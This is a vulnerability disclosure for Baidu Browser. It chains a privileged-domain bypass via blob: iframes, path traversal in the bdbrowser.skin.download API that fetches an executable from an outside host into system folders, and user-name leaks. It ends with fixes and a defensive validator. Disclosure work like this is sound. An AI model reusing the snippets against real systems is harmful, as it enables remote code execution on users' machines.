Baidu Browser Remote Command Execution 2-bypassing privileged domain restrictions and Solutions

Source: Internet
Author: User


Three vulnerabilities are chained in total:

1. Bypass the privileged-domain check

2. Use a defective privileged API to download an arbitrary program to a chosen directory

3. Exploit a user-name leak to download the program into the user's Startup directory

1. The privileged-domain restriction is flawed. Besides the two permitted origins, bdbrowser:// and http://xapp.baidu.com/, I found that the file: domain can also execute privileged APIs. Redirecting from an http page to a bdbrowser:// or file: URL is blocked with a prompt saying access to local resources is forbidden, which reminded me of something else that is also somewhat "local": a blob: URL. So I tested the following code in the console:


var data = '<script> execute privileged command </script>';
var blob = new Blob([data], { type: 'text/html' });
(function () {
    var iframe = document.createElement('iframe');
    iframe.src = URL.createObjectURL(blob);
    document.body.appendChild(iframe);
})();




The code executes successfully, so the privileged API can be called from any page.







2. The name parameter of the privileged API bdbrowser.skin.download is not filtered, so a "skin" file can be written to any directory on the system drive.

 

window.external.StartRequest(1,"bdbrowser.skin.download","(function(id,res){console.log(res)})","{\"name\":\"1/../../../../../../../../../../../../../cmd.exe\",\"url\":\"http://192.168.1.105/testbaidu.exe\"}",window,"")




For example, the call above creates a cmd.exe in the system root directory, as the original screenshot showed.





3. To actually run the program, it also has to be written to the system's Startup directory.



However, the Startup directory path contains the user name, which therefore has to be known. After some research, we found that the two APIs AppService.appMarket.downloadPack and AppService.appMarket.DeleteExt both leak the user name. Without the technique from the previous vulnerability, the former pops up an installation prompt while the latter does not; the latter, however, requires that a plug-in is already installed.








4. Combining the three steps above, we built the following PoC code, provided for reference only. We tested it on WIN7 and IE.


<Html> 



After the final execution, the result was as shown in the original screenshot.

Solution:

1. Fix the privileged-domain check.

2. Strictly filter the parameters of the privileged API bdbrowser.skin.download, restricting both the download path and the download source.

3. Remove the sensitive path information from the data returned by AppService.AppMarket.DownloadPack and AppService.AppMarket.DeleteExt; if the path is not needed by callers, do not return it at all.
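As an added example (not code from this write-up or from Baidu), here is how the checks named in solutions 1 and 2 could be implemented in JavaScript; the skin directory, the allowed download host and the skin file extension are assumptions:

```javascript
// Added, illustrative example: hardened versions of the two checks this
// write-up says were missing. It is NOT Baidu Browser's code; the skin
// directory, download host and skin extension below are assumptions.

const PRIVILEGED_HTTP_ORIGINS = new Set(['http://xapp.baidu.com']); // from the write-up
const SKIN_DIR = 'C:\\BaiduBrowser\\skins';                          // assumed layout
const ALLOWED_DOWNLOAD_HOSTS = new Set(['xapp.baidu.com']);         // assumed
const SKIN_EXT = 'zip';                                             // assumed

// Fix 1: privileged-domain check. blob: and file: URLs are never privileged,
// because any http page can mint a blob: URL (the bypass described above);
// only the bdbrowser: scheme and the listed http origin qualify.
function isPrivilegedOrigin(urlString) {
  let u;
  try { u = new URL(urlString); } catch (e) { return false; }
  if (u.protocol === 'blob:' || u.protocol === 'file:') return false;
  if (u.protocol === 'bdbrowser:') return true;
  return PRIVILEGED_HTTP_ORIGINS.has(u.origin);
}

// Fix 2: parameter filtering for bdbrowser.skin.download. `name` must be a
// single plain file-name component with the expected extension (so a value
// like "1/../../cmd.exe" is rejected), and `url` must point at an allowed
// host over http(s). Returns the resolved target path, or null if rejected.
function validateSkinDownload(params) {
  if (!params || typeof params.name !== 'string' || typeof params.url !== 'string') return null;
  const namePattern = new RegExp('^[A-Za-z0-9_-]{1,64}\\.' + SKIN_EXT + '$');
  if (!namePattern.test(params.name)) return null;
  let src;
  try { src = new URL(params.url); } catch (e) { return null; }
  if (src.protocol !== 'http:' && src.protocol !== 'https:') return null;
  if (!ALLOWED_DOWNLOAD_HOSTS.has(src.hostname)) return null;
  return SKIN_DIR + '\\' + params.name;
}
```

Both functions return a decision rather than throwing, so the privileged API dispatcher can log the rejected request with its origin and raw parameters for detection purposes.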
